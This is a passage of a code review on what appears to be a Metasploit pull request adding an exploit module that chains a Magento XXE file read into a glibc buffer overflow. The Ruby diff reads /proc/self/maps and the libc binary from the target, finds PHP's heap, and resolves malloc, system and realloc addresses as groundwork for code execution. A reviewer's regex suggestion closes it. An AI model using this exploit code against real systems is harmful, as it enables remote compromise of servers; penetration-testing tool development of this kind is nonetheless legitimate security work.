modules/exploits/linux/http/magento_xxe_to_glibc_buf_overflow.rb

```diff
@@ -0,0 +1,617 @@
+
+      arr << (region[:stop] - HEAP_SIZE + 0x40)
+    end
+
+    if heaps.empty?
+      raise ProcSelfMapsError, "Unable to find PHP's main heap in memory by parsing /proc/self/maps"
+    end
+
+    first = heaps[0]
+
+    if heaps.size > 1
+      heap_addresses = heaps.map { |heap| "0x#{heap.to_s(16)}" }.join(', ')
+      vprint_status("Potential heaps: [i]#{heap_addresses}[/] (using first)")
+    else
+      vprint_status("Using [i]0x#{first.to_s(16)}[/] as heap")
+    end
+
+    vprint_good('Successfully extracted the location in memory of the PHP heap')
+    first
+  end
+
+  def get_libc_region(regions, *names)
+    libc_region = regions.find do |region|
+      names.any? { |name| region[:path].include?(name) }
+    end
+
+    unless libc_region
+      raise ProcSelfMapsError, 'Unable to locate libc region in /proc/self/maps'
+    end
+
+    vprint_good("Successfully located the libc region in memory: #{libc_region}")
+    libc_region
+  end
+
+  def get_libc
+    @regions ||= get_regions
+    @info['heaps'] = find_main_heap(@regions)
+    @libc_region ||= get_libc_region(@regions, 'libc-', 'libc.so')
+    download_file(@libc_region[:path])
+  end
+
+  def get_symbols_and_addresses
+    begin
+      @libc_binary ||= get_libc
+    rescue ProcSelfMapsError => e
+      fail_with(Failure::UnexpectedReply, "There was an issue processing /proc/self/maps which is required to extract the libc version: #{e.class}: #{e}")
+    end
+    fail_with(Failure::UnexpectedReply, 'Unable to download the glibc binary, which is required to exploit. Rerunning the module could fix this issue.') unless @libc_binary
+
+    # ELFFile expects a file, instead of writing it to disk use StringIO
+    libc_binary_file = StringIO.new(@libc_binary)
+    elf = ELFTools::ELFFile.new(libc_binary_file)
+    symtab_section = elf.section_by_name('.dynsym')
+    symbols = symtab_section.symbols
+
+    @info['__libc_malloc'] = nil
+    @info['__libc_system'] = nil
+    @info['__libc_realloc'] = nil
+
+    symbols.each do |symbol|
+      if ['__libc_malloc', '__libc_system', '__libc_realloc'].include? symbol.name
+        @info[symbol.name] = symbol.header.st_value.to_i + @libc_region[:start]
+      end
+    end
+
+    fail_with(Failure::BadConfig, 'Unable to get necessary symbols from libc.so') unless @info['__libc_malloc'] && @info['__libc_system'] && @info['__libc_realloc']
+    vprint_status("__libc_malloc: #{@info['__libc_malloc']}")
+    vprint_status("__libc_system: #{@info['__libc_system']}")
+    vprint_status("__libc_realloc: #{@info['__libc_realloc']}")
+  end
+
+  def get_regions
+    # Obtains the memory regions of the PHP process by querying /proc/self/maps.
+    maps = download_file('/proc/self/maps')
+    raise ProcSelfMapsError, '/proc/self/maps was unable able to be downloaded' if maps.blank?
+
+    maps = maps.force_encoding('UTF-8')
+    pattern = /^([a-f0-9]+)-([a-f0-9]+)\b.*\s([-rwx]{3}[ps])\s(.*)/
```

Comment:
```suggestion
    pattern = /^([a-f0-9]+)-([a-f0-9]+)\b.*\s([-rwx]{3}[ps])\s(.+)$/
```

or did you forget to push?